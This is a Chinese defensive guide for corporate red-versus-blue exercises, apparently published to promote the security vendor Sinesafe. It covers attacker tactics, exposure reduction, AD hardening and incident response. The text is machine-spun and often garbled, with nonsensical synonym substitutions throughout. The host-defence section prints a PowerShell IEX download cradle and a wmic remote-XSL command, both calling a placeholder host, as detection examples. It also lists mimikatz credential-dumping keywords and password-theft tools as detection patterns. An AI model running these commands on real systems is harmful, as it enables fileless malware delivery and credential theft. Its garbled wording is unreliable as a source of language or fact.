近期大家Sinesafe报名参加的几家组织的渗入检测防御方安全防护计划方案评定复查,一部分防御方欠缺对进攻者的正确定知,进攻者的技巧早已较为精湛了,不扫描仪,不落地,污染系统日志等都很普及了。另外也要正确定知对手:攻防演习中,进攻者并不是没有不可以,她们遭遇着和防御力方1样的难题:時间紧,每日任务重。因此进攻者的进攻总体目标,进攻技巧也是有迹可循的,知心知彼才可以百战不殆。
渗入检测
1、知彼
进攻者也是讲成本费的,因而防御方最好是的对策是:做的比别的防御方好1点点便可。好1点的含意:不在低等难题上犯错误(弱登陆密码、互联网技术运用远程控制RCE、管理方法后台管理曝露、关键服务器未打补钉等)。针对 時间紧、每日任务重 的防御方来讲,建造铜墙铁壁的防御明显代表着大德本投入,和最急缺的時间,因而本文不容易考虑周全,只挑选性价比高值得迅速投入的安全性对策和大伙儿共享。
进攻者1般:总体目标确立、流程清楚、操纵成本费、反检验,反清除、3流分立。
总体目标确立:进攻者只进攻得分项,和必要相对路径(外网地址通道,内网立足于点),对这些总体目标采用高级方式,会隐敝实际操作;对非必要相对路径顺道操纵下来的服务器,其实不怕被发现,用起来较为随便,乃至积极生产制造噪声,影响防御方。
流程清楚:信息内容搜集-操纵通道-横向挪动-保持管理权限-进攻总体目标系统软件。每步全是經典实际操作和教科书式技巧。
操纵成本费:
优先选择进攻高管理权限账户,如管理方法员,总体目标系统软件责任人账户;
优先选择进攻运维管理/安全性人员账户和终端设备,这些人常常有服务器root账户,安全性机器设备管理方法员账户,能够进1步深层次操纵;
优先选择进攻集中化监管设备,如域控,集中化身份验证系统软件,终端设备管理方法系统软件,攻陷单系统软件即得到企业内绝大多数系统软件的管理权限;
优先选择进攻基本设备,如DNS,DHCP,电子邮件系统软件,专业知识共享服务平台,oa系统软件,工单系统软件;这些系统软件有内嵌高管理权限账户,或能够协助进攻者隐敝痕迹。或Git/SVN等开发设计源码管理方法服务器,根据编码财务审计发现运用0day系统漏洞。
反检验,反清除:
样版隐敝技术性(白运用(带微软签字的程序流程实行未签字的黑dll),样版不落地实行(从在网上载入样版,只运作在运行内存,不落盘不惊动杀软));
迅速外扩散(进攻者会将进攻包做成全自动化工厂具,减少人力资源投入,迅速操纵1批有系统漏洞发服务器);
终止系统日志外发,系统日志消除(脚本制作优先选择终止普遍系统日志外发专用工具;另外有开源系统全自动化工厂具来被劫持系统日志造成的过程,使得系统软件不造成系统日志;应用完后删掉aess.log等系统日志);
降低扫描仪,根据剖析系统日志、剖析配备文档、管理方法员来源于IP等方法来获得内网的别的设备IP信息内容,而并不是扫描仪。
点一下加上照片叙述(数最多60个字)
3流分立:
扫描仪流:用来大批扫描仪内网生存IP和系统漏洞,扫描仪源一般不被进攻者高度重视,被消除也不容易危害到进攻方案,高水平进攻者一般应用扫描仪个人行为来分散化防御方活力。
数据信息流:用来向外网地址很多传送非重要数据信息,一般是有互联网技术管理权限的终端设备或服务器(终端设备较多),非常少有隧道施工个人行为或扫描仪个人行为,根据简易的s,sftp方法传送数据信息
操纵流:用于接纳和传送远控命令的服务器,进攻者最高度重视的设备,应用起来最为慎重,和远控管理中心开展沟通交流,常见组件cobaltstrike, empire;有隧道施工个人行为,且数据信息传送量非常少,会联接若干个IP和网站域名(防止外网地址禁封),传送必然数据加密,不应用自签字资格证书。
在本次攻防实战演练演习提前准备环节,进攻方提前准备了几10个C2网站域名。
2、知心知心,关键是了解防御方防御地区内的财产信息内容,变小曝露面。标准以下:
无需的系统软件,该下的下,该中止的中止。无需的作用,该下的下,该中止的中止。(平常就应当这样解决,而并不是战时)
该撤销浏览的撤销,能限定浏览范畴的限定浏览范畴。
在用的,弄清楚作用,双流(数据信息流和运维管理流)谁用,有木有风险性,能否1键处理。
变小曝露面 1.按财产隶属纬度整理
互联网技术财产、支系组织财产、子企业财产、外联企业财产、公有制云财产、开发设计商、外包商。
非常容易忽略的:
公有制云财产,由于有的业务流程单位和支系组织公有制云申请办理都不历经IT单位,上面却放了很多业务流程数据信息。
开发设计商/外包商的财产。开发设计商/外包商1般给甲方外包开发设计信息内容系统软件,开发设计商/外包商企业內部也会自建Git/SVN等源码管理方法服务器,存有早已交货给甲方的信息内容系统软件源代码,而开发设计商/外包商的源代码系统软件管理方法安全性工作能力和甲方相比将会就差几个量级了。不良影响便是:根据得到的源代码,发现系统软件运用0day,从而操纵甲方已上线信息内容系统软件。
变小曝露面 2.按财产特性整理
非常关心财产的安全性特性:正中间件或架构(版本号)、对外开放在公网API插口(非常是未下线的老插口)、管理方法后台管理对外开放在公网、高危作用(文档提交点、短消息认证码、重设登陆密码、文档免费下载)、远程控制接入点(VPN)、权利账户(运用管理方法权利账户、运用联接账户、系统软件管理方法权利账户、能够改动账户管理权限的账户、备份数据账户、高管层账户)。
每个安全性特性全是血的经验教训。
变小曝露面 3.忽略点
全部內部文本文档服务器上(含OA、电子邮件系统软件、jira、wiki、专业知识库等)比较敏感信息内容清除或限定浏览管理权限,不必有:互联网拓扑、安全性安全防护计划方案和布署部位、各类登陆密码;
财产管理方法服务平台上,蜜罐不必叫蜜罐、安全性机器设备IP要掩藏;
各类动态口令:弱动态口令、默认设置动态口令、已泄漏动态口令。
每个忽略点全是眼泪的结晶。
安全性财产管理方法,更多內容报名参加:安全性财产管理方法中非常容易被忽略的几点
3、安全防护重要点
临战前,再想依照大而全的整理1遍,几没法能,最好是便是把安全防护重要点过1遍,谨记都具体看1遍,不必坚信他人的意见反馈。
3.1 安全性防护
渗入检测绕开
从实战演练看来,互联网层的浏览操纵被证实是最合理的(进攻者很难绕开去),不必坚信运用层操纵。互联网层浏览操纵属于基本构架安全性,这是最合理最关键的,全部安全性安全防护的基本。
浏览操纵对策标准:明细容许,默认设置回绝。
从内网去互联网技术的浏览操纵
办公终端设备:除某些协议书没法限定目地IP外,其余协议书所有限定。独特浏览要求,迅速启用。有标准的考虑到:终端设备不可以立即浏览互联网技术,必须浏览互联网技术的两种处理计划方案:此外分派1台上网终端设备、虚似访问器
办公服务器:独特浏览要求启用,默认设置回绝
生产制造网:生产制造网终端设备严禁上互联网技术、服务器独特浏览要求启用,默认设置回绝
2.互联网技术浏览内网:对互联网技术出示服务的服务器务必在DMZ,和内网防护。
3.关键系统软件的浏览操纵对策
基本设备如AD、电子邮件系统软件的浏览操纵。
别小视基本设备ACL浏览操纵,这是抵抗运用和系统软件系统漏洞的最低成本费和最合理对策。系统漏洞五花八门,惟有ACL浏览操纵药效长久,明显强烈推荐。
终端设备安全性监管、全自动化运维管理系统软件等集中化操纵系统软件后台管理登陆限定浏览来源于。(优先选择应用互联网浏览操纵、其次应用系统软件层限定、配搭应用运用层限定)
3.2 AD安全防护
提前准备环节
2.加固环节
抵抗管理权限提高:对域账户开展管理权限DACL整理,加固高管理权限账户
检验高管理权限账户能够用bloodhound网络黑客专用工具监测,还可以根据System Internal Tools的ADExplorer来开展检验:
1)改动登陆密码(提议在演习前邻近時间开展改动)
2)调剂管理权限和排序,依据账户的归属人的管理权限开展调账,撤销非域管账户的比较敏感管理权限。
3)改动排序内的不符合适的人员账户。
4)比较敏感账户不容许委派。
5)比较敏感账户不容许撤销Kerberos预鉴权。
6)比较敏感账户的登陆密码强度合乎要求。
7)具有立即域管或间接性域管管理权限(比如能够改动Domain Admins的账户就具有间接性域管管理权限)的账户的主题活动开展报备规章制度,演习期内未经容许不可开展任何实际操作,包含登陆这些。
8)办公机和终端设备演习前所有重新启动,清除比较敏感账户凭证保存。
9)服务器登陆查询有关凭证,假如有删掉或根据销户来删掉服务器上保存的凭证。
10)参考docs.microsoft/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-f--securing-domain-admins-groups-in-active-directory配备域管理方法员管理权限。
抵抗进攻者应用MS14-068,MS17-010进攻域:从旧到新先后安裝DC上的windows补钉。
抵抗进攻者应用ExchangeSSRF系统漏洞:从旧到新先后安裝Exchange上的windows补钉。
抵抗LDAP relay进攻:在域控上配备LDAP enforce signing。
抵抗LDAP relay和SSRF进攻:在域控上配备LDAPS channel binding。
抵抗LLMNR/NBT Poisoning进攻:关掉域内WPAD服务。
3.检验环节
渗入检测检验环节
标准:若域躁动不安全,最好修补计划方案是重新安装。
检验比较敏感共享资源文件目录浏览:浏览了AD服务器的非一切正常共享资源文件目录 (非SYSVOL文档夹)
检验mimikatz1系列进攻个人行为:
Mimikatz根据sysmon过程来开展检验,普遍重要字有 gentilkiwi (Benjamin DELPY) (企业名字)、
别的重要字:kerberos::golden sekurlsa::pth kerberos::ptt lsadump::dcshadow lsadump::dcsync sekurlsa::logonpasswords privilege::debug misc::skeleton
检验Kerberos弱数据加密方法:非AES数据加密方法的Kerberos单据数据加密恳求非常可疑
检验出现异常申请注册表变动和dump:DSRMAdminLogonBehavior
变动AdminSDHolder
导出来HKLM\SAM內容
导出来HKLM\SYSTEM內容
导出来HKLM\SECURITY內容
检验ntdsutil乱用:应用了ntdsutil的比较敏感主要参数activate instance ntds ;应用了ntdsutil的比较敏感主要参数set dsrm password
检验SID history变动:账户添加SID History取得成功、不成功
检验lazagne登陆密码提取专用工具:特点 lazagne
进攻者喜爱用的别的专用工具:
procdump、PsExec、cain、Mshta、cmstp、QuarkPwDump、getpass、gethash、ntdsdump、Get-PassHashes、Wce、psaattack。
3.3 主机安全防护(终端设备和服务器)抵抗
进攻者在尝试操纵终端设备和服务器时,以便绕开基本的杀毒手机软件,一般会应用1些免杀方式。而一些免杀方式(如白运用,样版不落地实行)因为十分平稳和高效率,更是遭受众多进攻者的亲睐。
1.Powershell IEX组建免费下载实行.(文档在运行内存实行,不落电脑硬盘)
运用编码示例:powershell.exe -nop -whidden -c IEX ((new-object.webclient).downloadstring('x.x.x.x:81/aa'))"
监测特点:"IEX AND (New-Object Net.WebClient).DownloadString
2.Windows系统软件白文档运用(wmic.exe
运用编码示例:cmd/c wmic os get /format: \\x.x.x.x\1.xsl start/wait notepad
监测特点:"wmic os get" AND "/format"3.Windows系统软件白文档运用(csc.exe)
运用编码示例:
"C:/Windows/Microsoft.NET/Framework64/v2.0.50727/csc.exe"/noconfig /fullpaths@"C:/Users/a/AppData/Local/Temp/l1xso2zu.cmdline"
监测特点:"csc.exe" AND ("/r:System.EnterpriseServices.dll"OR "/unsafe")4.Windows系统软件白文档运用(msiexec.exe)
特点:处于被动实行后台管理实行的主要参数,有1定误报率。请自主科学研究,已不举例。
5.检验certutil白运用
特点:普遍绕防火墙应用的主要参数。请自主科学研究,已不举例。
6.检验根据url.dll来开展不落地实行
请自主科学研究,已不举例。
3.4 账户和管理权限抵抗
高管理权限1律清除,限定应用范畴,每次应用后确定。
运用管理权限根据系统日志剖析检验乱用。
关心备份数据账户、可改动管理权限账户的应用。
终端设备24小时重新启动1次。(抵抗终端设备管理权限抓取类进攻)
3.5 一瞬间身亡
一瞬间身亡有两种方法:相对路径打穿、系统软件打穿。
3.5.1 相对路径打穿
立即从未想过(未布防)的相对路径进攻过来。电子邮件是操纵终端设备第1挑选通道,实际安全防护可参照《公司安全性基本建设指南:金融业制造行业安全性构架与技术性時间》第16章:电子邮件安全性。
边沿网包含无线网络和自助终端设备,包含:打卡机、全自动出售机、大会室机器设备、ATM机、排长队机等。限定无线网络和自助终端设备互联网和内网浏览。
限定支系组织、外联企业等互联网和总部的互联网浏览。
不必坚信基础理论上不可以全通,但具体上存在全通内网的系统软件。(死于便捷性)
3.5.2 系统软件打穿
系统软件打穿,全是血泪史。由于大家一直忘掉了这些最大的风险性源。优先选择进攻管理中心化的系统软件和跨两网的系统软件,包含终端设备安全性监管操纵台(操纵台安全性安全防护工作能力太弱)、运维管理管理方法系统软件/Zabbix/Nagios/碉堡机等、多点登陆SSO系统软件、AD主题活动文件目录;
优先选择进攻基本设备:DNS、DHCP、电子邮件系统软件、产品研发服务器SVN/Git;
高使用价值终端设备:
互联网管理方法员:终端设备内有互联网拓扑和ACL操纵对策,乃至能够改动浏览操纵;
安全性管理方法员:有安全性安全防护计划方案和检验系统软件、告警系统软件登陆管理权限,许多安全性系统软件做了登陆来源于限定,绕开方式之1便是操纵安全性管理方法员的终端设备,另外抓取安全性管理方法员账户登陆密码,进攻者1举两得;
产品研发本人终端设备/运维管理本人终端设备:高使用价值数据信息;
内网扫描仪器:互联网管理权限较大,哪都能去。
编码服务器:编码数据信息使用价值较为高。独享协议书开发设计的运用程序流程,源代码要维护好,有工作经验进攻精英团队带编码财务审计专业技能组员,根据源代码财务审计发现运用0day
3.6 非常容易出难题的点
互联网技术运用架构RCE
运用和正中间件管理方法后台管理曝露
VPN:未开启双要素,或存在未开启双要素的一部分客户
检测自然环境的检测系统软件未立即打补钉、弱登陆密码
根据电子邮件通道操纵办公终端设备
跨两网的机器设备
服务器登陆密码同质疑题
社工
4、事中合事后
前面共享了许多安全防护和检验的事项,但防御方到了这个环节,更关键的是考虑到1下事中的各种各样过载信息内容的研判和迅速紧急处理对策。
大家打內部攻防演习的情况下,最大的困扰是管理决策和处理。
4.1 过载信息内容研判
合理高速的管理决策体制,甚么管理权限范畴内的由甚么人管理决策,这是受权。
甚么职位(人)负责甚么,这是岗位职责区划。例如谁负责追踪每条告警信息内容到Closed情况?谁负责断网?谁负责样版剖析?谁负责陷落主机清查?谁负责溯源相对路径?谁负责纪录?谁负责报告?这些。
4.2 迅速紧急处理
4.2.1 硬件配置和后勤
大的作战室,容下所有防御团队;
好的白板(最好是电子器件的),便于整理进攻相对路径;
提前准备好零食和1日3餐、行军床。
4.2.2 关键信息内容同歩
早已失陷的IP清单(黑名单),同歩给全部防御方;
是不是C2网站域名迅速分辨,留意真伪难辨的网站域名。
4.2.3 各类紧急处理对策
断网:迅速断网的实际操作标准和全自动化工厂具
鱼饵
临时性加上ACL和FW标准
下线业务流程:和业务流程方创建通畅的沟通交流体制和迅速的管理决策体制
假如陷落(疑似)主机,管理决策用于鱼饵,尽量保证鱼饵的风险性可控性,万1不断运用鱼饵在内网横向挪动,再开展限定就艰难了。
留意精力分派,高水平进攻者一般应用扫描仪个人行为等方法来分散化防御方活力。
4.3 渗入检测复检
攻防实战演练演习后的总结改善提高,才是最后目地。
4.3.1 安全防护欠缺点和改善对策
安全性精英团队
合作精英团队
厂商和第3方
安全性精英团队不太好促进的工作中,不太好讲的话,要不到的資源,都可以以在这里提出来。
紧急处理欠缺点和改善对策,落实到人、方案和資源中,才是实干的。
4.3.3 資源不够,要資源
安全性经营是必然选择,参照 金融业业公司安全性基本建设之路
7*24小时的安全性经营,既然进攻对手是7*24小时的,为何安全性经营并不是呢?
4.3.4 必要的管理方法层报告
5、留意事项
不必危害业务流程。攻防演习前的加固,必须妥善评定对业务流程能用性危害,攻防演习中的紧急处理,必须妥善评定对业务流程能用性危害,终究,业务流程能用性才是大哥,安全性并不是,摆正心理状态和部位,假如对渗入检测有念头的盆友能够找技术专业的网站安全性企业来解决处理,中国强烈推荐Sinesafe,绿盟,正源星空,这些的网站安全性企业。
